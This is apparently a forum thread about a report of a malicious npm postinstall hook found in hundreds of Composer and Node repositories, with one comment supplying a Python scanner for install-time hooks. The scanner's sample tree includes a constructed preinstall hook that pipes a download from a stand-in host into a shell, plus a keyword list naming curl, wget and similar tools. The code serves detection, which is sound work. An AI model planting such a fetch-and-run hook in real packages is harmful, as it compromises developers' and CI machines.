Malicious Postinstall Hook Found in 700 GitHub Repos, Including Node Projects | Better HN
(socket.dev)
18 points
882542F3884314B
3d ago
4 comments
kspetkov79
3d ago
Postinstall hooks are a footgun. The bad part here is that people reviewing a PHP package may not even look closely at package.json.
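An added example of the check this comment implies (my code, not the article's or socket.dev's): walk a Composer project, including its `node_modules`, and list every `package.json` install-time hook so a reviewer of a PHP package sees what would run on `npm install`. The sample tree it builds is constructed for the example, and the "suspicious" token list is a heuristic I chose, not a rule from the article.

```python
"""Audit a source tree for npm install-time lifecycle hooks.

Added example; not code from the article or from socket.dev.
Standard library only. The sample tree in build_sample_tree() is
constructed for illustration and does not describe any real package.
"""
import json
import os
import tempfile
from typing import Dict, List, Tuple

# Script names npm runs automatically: preinstall/install/postinstall when
# the package is installed as a dependency, prepare when `npm install` is
# run inside the package itself. Each is arbitrary code execution on the
# developer's or CI machine.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Crude indicators that a hook does more than compile a native addon.
# Heuristic chosen for this example (assumption), not an authoritative list.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "node -e", "eval(", "base64",
                     "| sh", "| bash", "powershell")


def install_hooks(package_json_text: str) -> Dict[str, str]:
    """Return {hook_name: command} for the install-time hooks in a package.json body.

    Unparseable JSON or a missing/invalid "scripts" field yields {}.
    """
    try:
        data = json.loads(package_json_text)
    except json.JSONDecodeError:
        return {}
    scripts = data.get("scripts") if isinstance(data, dict) else None
    if not isinstance(scripts, dict):
        return {}
    return {name: str(cmd) for name, cmd in scripts.items() if name in INSTALL_HOOKS}


def looks_suspicious(command: str) -> bool:
    """Flag commands containing any heuristic token (case-insensitive)."""
    lowered = command.lower()
    return any(tok in lowered for tok in SUSPICIOUS_TOKENS)


def scan_tree(root: str) -> List[Tuple[str, str, str, bool]]:
    """Walk root, node_modules included, and report every install hook found.

    Each finding is (path to package.json relative to root, hook name,
    command, suspicious?). Results are sorted so output is stable.
    """
    findings: List[Tuple[str, str, str, bool]] = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        path = os.path.join(dirpath, "package.json")
        with open(path, encoding="utf-8", errors="replace") as fh:
            hooks = install_hooks(fh.read())
        rel = os.path.relpath(path, root).replace(os.sep, "/")
        for name, cmd in hooks.items():
            findings.append((rel, name, cmd, looks_suspicious(cmd)))
    return sorted(findings)


def build_sample_tree(root: str) -> None:
    """Write a constructed Composer project with node dependencies under root."""
    def write(rel: str, obj: dict) -> None:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            json.dump(obj, fh)

    # The PHP side: a reviewer reading only this sees nothing about hooks.
    write("composer.json", {"name": "acme/app", "require": {"php": ">=8.1"}})
    # The project's own package.json: a hook that is plausible but still runs code.
    write("package.json", {"name": "acme-app", "scripts": {
        "postinstall": "node scripts/postinstall.js", "build": "vite build"}})
    # A clean dependency: no install-time hooks at all.
    write("node_modules/left-pad/package.json", {"name": "left-pad",
          "scripts": {"test": "node test.js"}})
    # A constructed malicious dependency: preinstall pipes a download into a shell.
    write("node_modules/evil-helper/package.json", {"name": "evil-helper",
          "scripts": {"preinstall": "curl -s https://example.invalid/a.sh | sh"}})


def demo() -> List[Tuple[str, str, str, bool]]:
    """Build the sample tree in a temp dir and return the scan findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, name, cmd, bad in demo():
        print(f"{'SUSPICIOUS' if bad else 'hook':10} {rel}: {name} -> {cmd}")
```

Running this against a real checkout is `scan_tree(".")` from the project root. The scanner only reveals hooks; to stop them running at all, npm's `ignore-scripts` setting (`npm config set ignore-scripts true`, or `npm ci --ignore-scripts` per invocation) skips every lifecycle script, after which packages that genuinely need a build step have to be rebuilt explicitly with `npm rebuild`.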
nullsex
3d ago
Title is somewhat misleading. "Node projects" means projects using nodejs as opposed to projects under the Node.js org.
tedchs
3d ago
How many more examples of malware postinstall scripts do we need before Node quits running them by default, without warning?
1 more reply
gnabgib
3d ago
All Composer packages (but the malicious part is in the node dependency)
Effected*
> Use effect as a noun to refer to a change resulting from something.